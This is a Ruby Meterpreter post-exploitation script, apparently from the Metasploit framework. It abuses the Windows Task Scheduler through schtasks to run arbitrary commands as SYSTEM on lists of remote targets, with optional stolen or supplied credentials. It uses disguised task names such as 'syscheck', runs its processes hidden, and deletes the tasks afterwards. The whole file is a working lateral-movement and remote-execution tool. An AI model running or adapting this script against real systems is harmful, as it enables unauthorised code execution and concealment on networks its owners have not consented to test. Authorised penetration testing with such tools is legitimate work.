# $Id$ #Meterpreter script for abusing the scheduler service in windows #by scheduling and running a list of command against one or more targets #using schtasks command to run them as system. This script works with Windows XP, #Windows 2003, Windows Vista and Windows 2008. #Verion: 0.1.1 #Note: in Vista UAC must be disabled to be able to perform scheduling #and the meterpreter must be running under the profile of local admin #or system. ################## Variable Declarations ################## session = client # Setting Arguments @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help menu." ], "-c" => [ true,"Commands to execute. Several commands can be given but separated by commas and enclose the list in double quotes if arguments are used."], "-u" => [ true,"Username to schedule task, if none is given the current user credentials will be used."], "-p" => [ true,"Password for user account specified, it must be given if a user is given."], "-d" => [ true,"Delay between the execution of commands in seconds, default is 2 seconds if not given."], "-t" => [ true,"Remote system to schedule job."], "-l" => [ true,"Text file with list of targets, one per line."], "-s" => [ true,"Text file with list of commands, one per line."] ) #Setting Argument variables commands = [] targets = [] username = nil password = nil delay = 2 help = 0 def usage print_status( "This Meterpreter script is for running commands on targets system using the") print_status( "Windows Scheduler, it is based on the tool presented but not released by Val Smith") print_status( "in Defcon 16 ATAbuser. If no user and password is given it will use the permissions") print_status( "of the process Meterpreter is running under.") print_status( "Options:") print_status( @@exec_opts.usage ) end def abuse(session,targets,commands,username,password,delay) #for each target targets.each do |t| #for eacg command commands.each do |c| taskname = "syscheck#{rand(100)}" success = false #check if user name and password where given, if not credential of running process used if username == nil && password == nil print_status("Scheduling command #{c} to run .....") execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{c}\" /sc once /ru system /s #{t} /st 00:00:00" r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true}) #check if successfully scheduled while(d = r.channel.read) if d =~ /successfully been created/ print_status("The scheduled task has been successfully created") success = true end end #check if schedule successful, if not raise error if !success print_status("Failed to create scheduled task!!") raise "Command could not be Scheduled" elsif success print_status("Running command on #{t}") session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{t}") end r.channel.close r.close #Wait before scheduling next command sleep(delay) print_status("Removing scheduled task") session.sys.process.execute("cmd.exe /c schtasks /delete /tn #{taskname} /s #{t} /F") else print_status("Scheduling command #{c} to run .....") execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{c}\" /sc once /ru system /s #{t} /u #{username} /p #{password} /st 00:00:00" r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true}) #check if successfully scheduled while(d = r.channel.read) if d =~ /successfully been created/ print_status("The scheduled task has been successfully created") success = true end end #check if schedule successful, if not raise error if !success print_status("Failed to create scheduled task!!") raise "Command could not be Scheduled" elsif success print_status("Running command on #{t}") session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{t} /u #{username} /p #{password}") end r.channel.close r.close #Wait before scheduling next command sleep(delay) print_status("Removing scheduled task") session.sys.process.execute("cmd.exe /c schtasks /delete /tn #{taskname} /s #{t} /u #{username} /p #{password} /F") end end end end @@exec_opts.parse(args) { |opt, idx, val| case opt when "-c" commands = val.split(',') when "-u" username = val when "-p" password = val when "-t" targets = val.split(',') when "-d" delay = val.to_i when "-s" script = val if not ::File.exists?(script) raise "Command List File does not exists!" else ::File.open(script, "r").each_line do |line| commands << line.chomp end end when "-l" list = val if not ::File.exists?(list) raise "Command List File does not exists!" else ::File.open(list, "r").each_line do |line| targets << line.chomp end end when "-h" help = 1 end } print_status("Meterpreter session running as #{session.sys.config.getuid}") if help == 0 && commands.length != 0 abuse(session,targets,commands,username,password,delay) else usage end